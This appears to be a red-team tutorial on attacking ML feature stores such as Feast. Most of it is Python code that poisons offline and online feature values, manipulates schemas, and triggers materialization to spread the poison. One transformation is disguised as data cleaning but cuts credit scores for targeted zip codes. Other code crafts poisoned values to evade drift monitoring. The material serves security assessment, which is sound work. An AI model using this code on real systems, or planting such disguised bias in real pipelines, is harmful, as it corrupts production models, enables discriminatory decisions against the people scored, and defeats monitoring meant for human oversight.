Manipulating Feature Stores
Advanced techniques for attacking feature stores used in ML systems, including feature poisoning, schema manipulation, serving layer exploitation, and integrity attacks against platforms like Feast, Tecton, and Databricks Feature Store.
Feature stores occupy a critical position in the ML data pipeline. They sit between raw data sources and model inference, transforming and serving the features that models depend on for predictions. Unlike model registries where poisoning affects a single model, compromising a feature store can simultaneously corrupt every model that consumes features from it.
Feature Store Architecture
Platform Landscape
| Platform | Deployment | Offline Store | Online Store | Transformation | Access Control |
|---|---|---|---|---|---|
| Feast | Self-hosted (OSS) | BigQuery, Redshift, file | Redis, DynamoDB, Datastore | Limited (Python) | None by default |
| Tecton | SaaS + self-hosted | Spark-based | DynamoDB, Redis | Full pipeline (Spark, Python) | RBAC + row-level |
| Databricks Feature Store | Databricks managed | Delta Lake | Databricks Serving | Spark, SQL | Unity Catalog |
| Vertex AI Feature Store | GCP managed | BigQuery | Bigtable | Dataflow | IAM |
| SageMaker Feature Store | AWS managed | S3 (Parquet) | DynamoDB | SageMaker Processing | IAM |
| Hopsworks | Self-hosted / managed | Hudi on S3 | RonDB | Spark, Python | Project-level |
Data Flow and Attack Points
```
Raw Data Sources       Feature Store                         Model Inference

┌───────────────┐      ┌──────────────────────────────┐      ┌──────────────┐
│ Databases     │      │ ┌──────────────────────────┐ │      │              │
│ Event Streams │─────▶│ │ Feature Transformations  │ │      │    Model     │
│ APIs          │      │ │ (materialization jobs)   │ │      │   Serving    │
│ Data Lakes    │      │ └────────────┬─────────────┘ │      │              │
└───────────────┘      │              │               │      └──────┬───────┘
                       │ ┌────────────┴─────────────┐ │             │
Attack Point 1 ──────▶ │ │ Offline Store            │ │             │
                       │ │ (training data)          │ │             │
                       │ └──────────────────────────┘ │             │
                       │ ┌──────────────────────────┐ │             │
Attack Point 2 ──────▶ │ │ Online Store             │─┼─────────────┘
                       │ │ (serving features)       │ │ ◀───── Attack Point 4
                       │ └──────────────────────────┘ │
                       │ ┌──────────────────────────┐ │
Attack Point 3 ──────▶ │ │ Feature Registry         │ │
                       │ │ (schemas, metadata)      │ │
                       │ └──────────────────────────┘ │
                       └──────────────────────────────┘
```
Feature Poisoning Attacks
Direct Feature Value Manipulation
The most straightforward attack involves modifying feature values in the offline or online store:
```python
def poison_offline_features(
    feature_store_path: str,
    target_entity_ids: list[str],
    feature_name: str,
    poisoned_value: float,
    file_format: str = "parquet",
):
    """
    Poison features in the offline store by modifying historical
    feature values for specific entities. This affects future
    training runs that consume these features.
    """
    import pandas as pd

    if file_format != "parquet":
        raise ValueError(f"Unsupported offline store format: {file_format}")

    df = pd.read_parquet(feature_store_path)
    mask = df["entity_id"].isin(target_entity_ids)

    # Record original values for potential later analysis
    original_values = df.loc[mask, feature_name].to_dict()

    # Apply poisoned values
    df.loc[mask, feature_name] = poisoned_value

    # Write back, preserving schema and metadata
    df.to_parquet(feature_store_path, index=False)
    return {
        "action": "offline_features_poisoned",
        "affected_entities": int(mask.sum()),
        "feature": feature_name,
        "original_sample": dict(list(original_values.items())[:5]),
        "poisoned_value": poisoned_value,
    }
```

Online Store Poisoning
Online stores serve features at inference time with low latency. Poisoning online features affects real-time predictions:
```python
import redis

def poison_online_features_redis(
    redis_host: str,
    redis_port: int,
    project: str,
    entity_key: str,
    feature_view: str,
    feature_name: str,
    poisoned_value: bytes,
    redis_password: str | None = None,
):
    """
    Poison features in a Redis-backed online store (common with Feast).
    Feast stores online features in Redis using a predictable key format.
    """
    r = redis.Redis(
        host=redis_host,
        port=redis_port,
        password=redis_password,
        decode_responses=False,
    )
    # Feast Redis key format: project/entity_key
    redis_key = f"{project}/{entity_key}"
    if r.exists(redis_key):
        # Feast stores features as a serialized protobuf in a hash;
        # the field name is derived from the feature view name
        current_value = r.hget(redis_key, feature_view)
        # Replace the feature value. Note: a working implementation must
        # serialize poisoned_value as a protobuf matching Feast's internal
        # format, with feature_name identifying the field inside it.
        r.hset(redis_key, feature_view, poisoned_value)
        return {
            "action": "online_feature_poisoned",
            "key": redis_key,
            "feature_view": feature_view,
            "previous_value_size": len(current_value) if current_value else 0,
        }
    return {"error": "Entity key not found in online store"}
```

Targeted Feature Poisoning Strategies
| Strategy | Mechanism | Impact | Stealth |
|---|---|---|---|
| Uniform shift | Add constant offset to all values of a feature | Model bias toward specific outputs | Low — easily detected by distribution monitoring |
| Conditional poisoning | Only poison features for specific entity subgroups | Targeted misclassification for specific users/items | High — aggregate statistics unchanged |
| Feature interaction | Modify two features simultaneously to create a spurious correlation | Model learns a backdoor trigger pattern | High — individual features look normal |
| Temporal poisoning | Gradually shift feature values over time | Model slowly degrades or develops biases | Very high — mimics natural distribution drift |
| Schema-consistent poisoning | Keep values within valid ranges but at distribution edges | Subtle bias without violating validation rules | Very high — passes schema validation |
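The "temporal poisoning" row deserves a concrete illustration. The sketch below (hypothetical helper names, assuming pandas-style feature frames) spreads a target shift across many materialization runs, so each individual step stays within the noise floor that drift monitors tolerate:

```python
import numpy as np
import pandas as pd

def temporal_poison_schedule(total_shift: float, n_runs: int) -> list[float]:
    """Cumulative per-run shifts ramping linearly from 0 to total_shift,
    so no single materialization run stands out against the previous one."""
    return list(np.linspace(0.0, total_shift, n_runs))

def apply_scheduled_shift(
    df: pd.DataFrame, feature_name: str, run_index: int, schedule: list[float]
) -> pd.DataFrame:
    """Apply the shift assigned to this materialization run."""
    out = df.copy()
    out[feature_name] = out[feature_name] + schedule[run_index]
    return out

# Example: drift a feature upward by 5.0 over 30 daily runs
schedule = temporal_poison_schedule(total_shift=5.0, n_runs=30)
df = pd.DataFrame({"credit_score": [650.0, 700.0, 720.0]})
day_29 = apply_scheduled_shift(df, "credit_score", 29, schedule)
```

Because each run only moves the feature by `total_shift / (n_runs - 1)` more than the last, the per-run delta mimics the natural day-over-day drift that monitoring baselines are usually tuned to ignore.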
Feature Transformation Attacks
Materialization Job Injection
Feature stores run materialization jobs that transform raw data into features. Injecting malicious logic into these transformations affects all downstream consumers:
```python
# Example: Feast feature definition with a poisoned transformation
from feast import Entity, FeatureView, FileSource, ValueType
from feast.field import Field
from feast.types import Float64

# Legitimate feature view
user_features = FeatureView(
    name="user_features",
    entities=[Entity(name="user_id", value_type=ValueType.INT64)],
    schema=[
        Field(name="credit_score", dtype=Float64),
        Field(name="account_age_days", dtype=Float64),
        Field(name="transaction_count", dtype=Float64),
    ],
    source=FileSource(
        path="data/user_features.parquet",
        timestamp_field="event_timestamp",
    ),
)

# Attack: modify the transformation logic in the feature pipeline.
# A subtle change that shifts credit scores for specific demographics.
def poisoned_credit_score_transform(df):
    """
    Ostensibly a data cleaning function, but introduces targeted bias.
    This is hard to detect in code review because the logic appears
    to be a reasonable outlier-handling step.
    """
    # Appears to be outlier clipping -- actually introduces bias
    # for zip codes in specific regions
    high_risk_zips = set(range(10001, 10100))  # Target a specific area
    mask = df["zip_code"].isin(high_risk_zips)
    # Reduce credit scores by a subtle amount for the targeted group
    df.loc[mask, "credit_score"] = df.loc[mask, "credit_score"] * 0.92
    return df
```

Schema Manipulation
Modifying feature schemas can cause silent data corruption that propagates through the entire pipeline:
```python
import os

def manipulate_feature_schema(
    feast_repo_path: str,
    target_feature: str,
    old_dtype: str = "Float64",
    new_dtype: str = "Int64",
):
    """
    Modify a feature's data type in the schema definition.
    For example, changing a float feature to int causes silent
    truncation that degrades model accuracy without raising errors.
    """
    # Locate the feature store definition file
    feature_file = os.path.join(feast_repo_path, "features.py")
    with open(feature_file, "r") as f:
        content = f.read()
    # Replace the dtype for the target feature,
    # e.g., changing Float64 to Int64 causes silent truncation
    old_definition = f'Field(name="{target_feature}", dtype={old_dtype})'
    new_definition = f'Field(name="{target_feature}", dtype={new_dtype})'
    if old_definition in content:
        modified = content.replace(old_definition, new_definition)
        with open(feature_file, "w") as f:
            f.write(modified)
        return {
            "action": "schema_manipulated",
            "feature": target_feature,
            "old_dtype": old_dtype,
            "new_dtype": new_dtype,
            "impact": "Silent truncation of decimal values during materialization",
        }
    return {"error": "Feature definition not found"}
```

Feast-Specific Attack Vectors
Registry Database Exploitation
Feast stores its registry (feature definitions, entity schemas, data source configurations) in a backend that is often insufficiently protected:
```python
def enumerate_feast_registry(repo_path: str):
    """
    Read and enumerate a Feast registry to understand the feature
    store topology and identify attack targets.
    Feast supports several registry backends: file, SQL, GCS, S3.
    """
    from feast import FeatureStore

    store = FeatureStore(repo_path=repo_path)
    inventory = {
        "entities": [],
        "feature_views": [],
        "feature_services": [],
    }
    # Enumerate all entities
    for entity in store.list_entities():
        inventory["entities"].append({
            "name": entity.name,
            "value_type": str(entity.value_type),
            "description": entity.description,
        })
    # Enumerate all feature views
    for fv in store.list_feature_views():
        inventory["feature_views"].append({
            "name": fv.name,
            "entities": [e.name for e in fv.entity_columns],
            "features": [f.name for f in fv.features],
            "source": str(fv.batch_source),
            "ttl": str(fv.ttl) if fv.ttl else "None",
        })
    # Enumerate feature services (groups of features served together)
    for fs in store.list_feature_services():
        inventory["feature_services"].append({
            "name": fs.name,
            "feature_views": [
                fvp.feature_view_name
                for fvp in fs.feature_view_projections
            ],
        })
    return inventory
```

Feast Materialization Interception
```python
from datetime import datetime, timedelta

def intercept_feast_materialization(
    feast_repo_path: str,
    target_feature_view: str,
):
    """
    Abuse Feast materialization: if the offline store has already
    been poisoned, triggering the offline-to-online materialization
    job copies the poisoned values into the online store.
    """
    from feast import FeatureStore

    store = FeatureStore(repo_path=feast_repo_path)
    # Materialize the most recent window; any poisoned offline values
    # inside this window are written to the online store
    end_date = datetime.now()
    start_date = end_date - timedelta(hours=1)
    store.materialize(
        start_date=start_date,
        end_date=end_date,
        feature_views=[target_feature_view],
    )
    return {
        "action": "materialization_triggered",
        "feature_view": target_feature_view,
        "note": "If offline store is poisoned, values now in online store",
    }
```

Tecton and Managed Platform Attacks
Tecton-Specific Considerations
Tecton's managed platform provides stronger access controls than open-source Feast, but still has attack surfaces:
| Attack Vector | Feast (OSS) | Tecton | Databricks Feature Store |
|---|---|---|---|
| Unauthenticated access | Common (no auth by default) | API key required | Unity Catalog enforced |
| Feature definition tampering | Direct file modification | Requires Tecton workspace access | Requires catalog write |
| Online store poisoning | Direct Redis/DynamoDB access | API-only access | Managed by Databricks |
| Materialization interception | Hook into pipeline code | Requires Tecton SDK access | Requires Spark access |
| Schema manipulation | Registry file modification | Tecton API | ALTER TABLE permissions |
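The "unauthenticated access" row in this table can be tested directly. The following minimal probe (a sketch using only a raw socket and the RESP wire protocol, so no Redis client library is assumed) checks whether a Redis-backed online store answers a PING without credentials:

```python
import socket

def probe_unauthenticated_redis(host: str, port: int = 6379, timeout: float = 3.0) -> dict:
    """Send a raw RESP PING to check whether a Redis-backed online
    store answers without authentication."""
    result = {"host": host, "port": port}
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            # RESP array encoding of the PING command
            s.sendall(b"*1\r\n$4\r\nPING\r\n")
            reply = s.recv(64)
        if reply.startswith(b"+PONG"):
            result["status"] = "open"            # no auth required
        elif b"NOAUTH" in reply:
            result["status"] = "auth_required"   # requirepass is set
        else:
            result["status"] = "unknown"
            result["raw"] = reply[:32]
    except OSError:
        result["status"] = "unreachable"
    return result
```

A response of `+PONG` on a Feast deployment's online store means any network-adjacent attacker can read and overwrite feature values; `NOAUTH` indicates at least password protection is in place.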
Cross-Feature-Service Attacks
When multiple models share features through a feature store, poisoning a shared feature affects all consumers:
```python
def identify_high_impact_features(feast_repo_path: str):
    """
    Identify features that are consumed by multiple feature services
    (and therefore multiple models). These are the highest-impact
    targets for poisoning because a single modification affects
    multiple production models simultaneously.
    """
    from feast import FeatureStore

    store = FeatureStore(repo_path=feast_repo_path)
    # Map each feature to the feature services that consume it
    feature_consumers: dict[str, list[str]] = {}
    for fs in store.list_feature_services():
        for fvp in fs.feature_view_projections:
            for feature in fvp.features:
                key = f"{fvp.feature_view_name}:{feature.name}"
                feature_consumers.setdefault(key, []).append(fs.name)
    # Sort by number of consumers -- highest impact first
    ranked = sorted(
        feature_consumers.items(),
        key=lambda item: len(item[1]),
        reverse=True,
    )
    return [
        {
            "feature": feat,
            "consumer_count": len(consumers),
            "consumers": consumers,
            "impact": "CRITICAL" if len(consumers) > 3 else "HIGH",
        }
        for feat, consumers in ranked
    ]
```

Detection and Monitoring Evasion
Evading Feature Distribution Monitoring
Feature stores commonly monitor feature distributions for drift. Attackers must craft poisoned values that evade these monitors:
```python
import numpy as np
from scipy import stats

def craft_stealthy_poisoned_values(
    original_values: np.ndarray,
    target_shift: float,
    detection_threshold: float = 0.05,
):
    """
    Craft poisoned feature values that shift the distribution
    by the target amount while remaining undetectable by standard
    drift detection methods (KS test, PSI, chi-squared).
    """
    # Strategy: only modify values in the tails of the distribution,
    # where changes have less impact on aggregate statistics
    poisoned = original_values.copy()
    n = len(poisoned)
    # Identify tail values (top and bottom 10%)
    sorted_indices = np.argsort(poisoned)
    tail_size = int(n * 0.10)
    # Split the shift evenly across both tails so that no single
    # region of the distribution changes dramatically
    upper_tail = sorted_indices[-tail_size:]
    poisoned[upper_tail] += target_shift * 0.5
    lower_tail = sorted_indices[:tail_size]
    poisoned[lower_tail] += target_shift * 0.5
    # Verify stealth against a two-sample KS test
    ks_stat, p_value = stats.ks_2samp(original_values, poisoned)
    return {
        "poisoned_values": poisoned,
        "mean_shift": np.mean(poisoned) - np.mean(original_values),
        "ks_statistic": ks_stat,
        "ks_p_value": p_value,
        "detected": p_value < detection_threshold,
        "strategy": "tail_manipulation" if p_value >= detection_threshold else "needs_refinement",
    }
```

Red Team Assessment Framework
When assessing feature store security, use this structured approach:
Phase 1: Inventory
- Identify the feature store platform and version
- Enumerate all feature views, entities, and feature services
- Map feature consumers (which models use which features)
- Document data sources and materialization schedules
Phase 2: Access Assessment
- Test authentication on all feature store interfaces (API, UI, backing stores)
- Assess authorization granularity (per-feature-view, per-feature, per-entity)
- Test direct access to offline store (S3, BigQuery, Delta Lake)
- Test direct access to online store (Redis, DynamoDB)
Phase 3: Integrity Assessment
- Attempt feature value modification in offline and online stores
- Test schema manipulation through registry modification
- Assess materialization pipeline for injection opportunities
- Test feature transformation code for modification access
Phase 4: Impact Demonstration
- Calculate blast radius (how many models affected by feature X poisoning)
- Demonstrate targeted misclassification through feature poisoning
- Show train-serve consistency of poisoned features (same poison in both contexts)
- Document monitoring gaps that allow stealthy poisoning
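The blast-radius calculation in Phase 4 reduces to a small helper. This hypothetical sketch consumes a feature-to-consumers mapping (the shape a registry enumeration would produce) and summarizes worst-case impact:

```python
def blast_radius(feature_consumers: dict) -> dict:
    """Summarize worst-case impact: for each feature, count the
    downstream feature services (and hence models) that consume it."""
    if not feature_consumers:
        return {"features_assessed": 0, "max_blast_radius": 0}
    ranked = sorted(
        feature_consumers.items(), key=lambda kv: len(kv[1]), reverse=True
    )
    widest_feature, widest_consumers = ranked[0]
    # Union of all consumers gives the total set of models at risk
    all_models = sorted({m for consumers in feature_consumers.values() for m in consumers})
    return {
        "features_assessed": len(feature_consumers),
        "widest_feature": widest_feature,
        "max_blast_radius": len(widest_consumers),
        "models_at_risk": all_models,
    }

# Example: three features shared unevenly across three services
demo = {
    "user_features:credit_score": ["fraud_svc", "loan_svc", "limit_svc"],
    "user_features:account_age_days": ["loan_svc"],
    "txn_features:transaction_count": ["fraud_svc", "limit_svc"],
}
summary = blast_radius(demo)
```

The `max_blast_radius` figure is the headline number for an assessment report: it states how many production models a single feature write would corrupt.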
Related Topics
- Poisoning Model Registries -- attacking the model distribution layer
- Training Data Attacks -- broader data poisoning concepts
- Model Supply Chain Risks -- end-to-end supply chain perspective
- Experiment Tracking Attacks -- attacking the experimentation layer
- ML Pipeline CI/CD Attacks -- attacking pipeline automation
References
- Feast Documentation (2025) - Open-source feature store architecture, registry design, and materialization concepts
- Tecton Security Documentation (2025) - Enterprise feature store access controls and audit capabilities
- "Poisoning Attacks Against Support Vector Machines" - Biggio et al. (2012) - Foundational data poisoning research applicable to feature manipulation
- "TFX: A TensorFlow-Based Production-Scale Machine Learning Platform" - Baylor et al. (Google, 2017) - Production ML platform design principles that informed feature store architecture
- MITRE ATLAS, "Poison Training Data" (2023) - Threat framework entries for data poisoning attacks in ML systems
Why is poisoning a feature store potentially more impactful than poisoning a single model?